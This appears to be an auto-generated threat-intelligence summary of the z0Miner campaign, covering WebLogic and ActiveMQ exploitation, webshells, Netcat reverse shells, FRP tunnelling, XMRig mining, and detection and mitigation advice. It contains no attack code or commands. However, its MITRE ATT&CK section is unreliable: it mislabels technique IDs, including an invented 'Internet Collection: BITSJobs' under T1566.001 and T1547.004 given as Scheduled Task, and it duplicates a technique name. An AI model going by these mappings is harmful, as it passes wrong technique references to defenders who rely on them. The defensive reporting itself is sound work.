Full Report
Researchers observed threat actor z0Miner targeting Korean WebLogic servers as download servers for distributing malware, including miners and network tools. It is recommended to look for indicators of compromise in your environment, and if any are identified, remove the files...
Analysis Summary
# Tool/Technique: z0Miner Campaign Tools and Techniques
## Overview
The z0Miner campaign involves a threat actor (or group using the z0Miner moniker) targeting Korean WebLogic servers primarily for resource hijacking via cryptocurrency mining, using the compromised servers as download infrastructure for subsequent malware stages.
## Technical Details
- Type: Campaign Payload Distribution/Resource Hijacking
- Platform: Windows, Linux (targeting WebLogic/Apache ActiveMQ environments)
- Capabilities: Initial exploitation, webshell deployment, backdoor/remote access establishment, cryptomining payload delivery, persistence setup.
- First Seen: January 26, 2024 (Observed activity date)
## MITRE ATT&CK Mapping
This campaign utilizes several techniques across different stages:
- **Initial Access (TA0001)**
- T1190 - Exploit Public-Facing Application
- CVE-2020-14882 (WebLogic)
- CVE-2023-46604 (Apache ActiveMQ)
- **Execution (TA0002)**
- T1059.001 - Command and Scripting Interpreter: PowerShell (Windows downloads)
- T1566.001 - Internet Collection: BITSJobs (Implied by download methods)
- T1059.003 - Command and Scripting Interpreter: Command and Scripting Interpreter: Windows Command Shell (used implicitly via command execution)
- T1059.006 - Command and Scripting Interpreter: Python (Possible for custom scripts, though not explicitly named)
- **Persistence (TA0003)**
- T1547.004 - Boot or Logon Autostart Execution: Scheduled Task
- T1546.008 - Event Triggered Execution: WMI Event Subscription
- **Command and Control (TA0011)**
- T1090 - Proxy
- T1090.003 - Proxy: Multi-hop Proxy (Implied via FRP for RDP)
- **Lateral Movement (TA0008)**
- T1021.001 - Remote Services: Remote Desktop Protocol (Facilitated by AnyDesk and FRP tunneling)
- **Impact (TA0040)**
- T1496 - Resource Hijacking (Primary goal: Cryptomining)
## Functionality
### Core Capabilities
- **Vulnerability Exploitation:** Initial compromise achieved via known flaws in Oracle WebLogic (CVE-2020-14882) and Apache ActiveMQ (CVE-2023-46604).
- **WebShell Deployment:** Uploading JSP WebShells (JSP File Browser, Shack2, Behinder) to maintain access post-exploitation on the compromised servers.
- **Malware Distribution:** Using the compromised WebLogic server as a download facility for distributing subsequent payloads (miners, network tools).
- **Payload Fetching:** Using native OS tools (`powershell.exe`, `certutil.exe` on Windows, `curl` on Linux) to fetch and execute secondary stages.
### Advanced Features
- **Remote Access Establishment:** Deploying **Netcat** to establish reverse shell connections, specifically noting its use to bypass firewalls.
- **Alternative Remote Access:** Installation of **AnyDesk** in observed cases following ActiveMQ exploitation.
- **RDP Tunneling:** Utilizing **FRP** (default and customized versions) to facilitate Remote Desktop Protocol (RDP) communication, likely for persistent C2 or further internal lateral movement.
- **Persistence Mechanisms:** Establishing persistence through WMI Event Filters/Consumers or using the native Windows **Task Scheduler (`schtasks`)**.
- **Payload:** Distribution of various versions of **XMRig** for cryptomining on both Windows and Linux systems.
## Indicators of Compromise
*Note: Specific file hashes/IPs were not provided in the context; only tool names used.*
- File Hashes: [Not provided in context]
- File Names:
- XMRig executables (Windows/Linux variants)
- Netcat executables
- AnyDesk installer/executable
- JSP WebShell files (JSP File Browser, Shack2, Behinder)
- Registry Keys: WMI Event Filters/Consumers related to Persistence.
- Network Indicators: Traffic related to XMRig mining pools (destination unknown), C2 traffic over ports used by Netcat shells, FRP communication.
- Behavioral Indicators:
- Spawning of `powershell.exe` or `certutil.exe` initiating large outbound downloads/file drops.
- Creation of WMI persistence entries.
- Execution of scheduled tasks (`schtasks`) created seemingly by an exploited web process.
- High CPU usage indicative of cryptomining (XMRig execution).
## Associated Threat Actors
- z0Miner (Campaign/Actor designation used in the report)
## Detection Methods
- Signature-based detection: Signatures for known XMRig binaries or specific WebShell files.
- Behavioral detection: Monitoring for the abuse use of `certutil.exe` or `powershell.exe` for remote file retrieval; monitoring for WMI/Task Scheduler modification by unusual parent processes (e.g., Java/WebLogic processes).
- YARA rules: Potentially targeting known patterns within the deployed JSP files or XMRig binaries.
## Mitigation Strategies
- **Patching:** Immediately apply patches for known vulnerabilities in WebLogic (CVE-2020-14882) and Apache ActiveMQ (CVE-2023-46604).
- **Application Hardening:** Implement strict Web Application Firewall (WAF) rules or context-aware access controls to prevent the upload or execution of JSP files in web application directories.
- **Network Segmentation:** Restrict outbound connections from WebLogic/Application servers only to necessary endpoints to limit communication with mining pools or external C2s.
- **Monitoring:** Monitor for the creation of persistence mechanisms (WMI subscriptions, scheduled tasks) originating from non-standard users or processes.
- **Recovery:** Redeploy workloads from a known clean state upon identification of compromise.
## Related Tools/Techniques
- **XMRig:** Popular open-source Monero cryptomining software.
- **Netcat (nc):** Used extensively for basic networking tests, shell establishment, and C2 communication.
- **FRP:** Used here as a tunneling/proxy tool, potentially creating reverse connections or obfuscated RDP channels.
- **JSP WebShells (Behinder/Shack2):** Common post-exploitation tools providing file browsing and execution capabilities via the web server context.
- **AnyDesk:** Used as an additional, legitimate remote access solution for maintaining persistent access.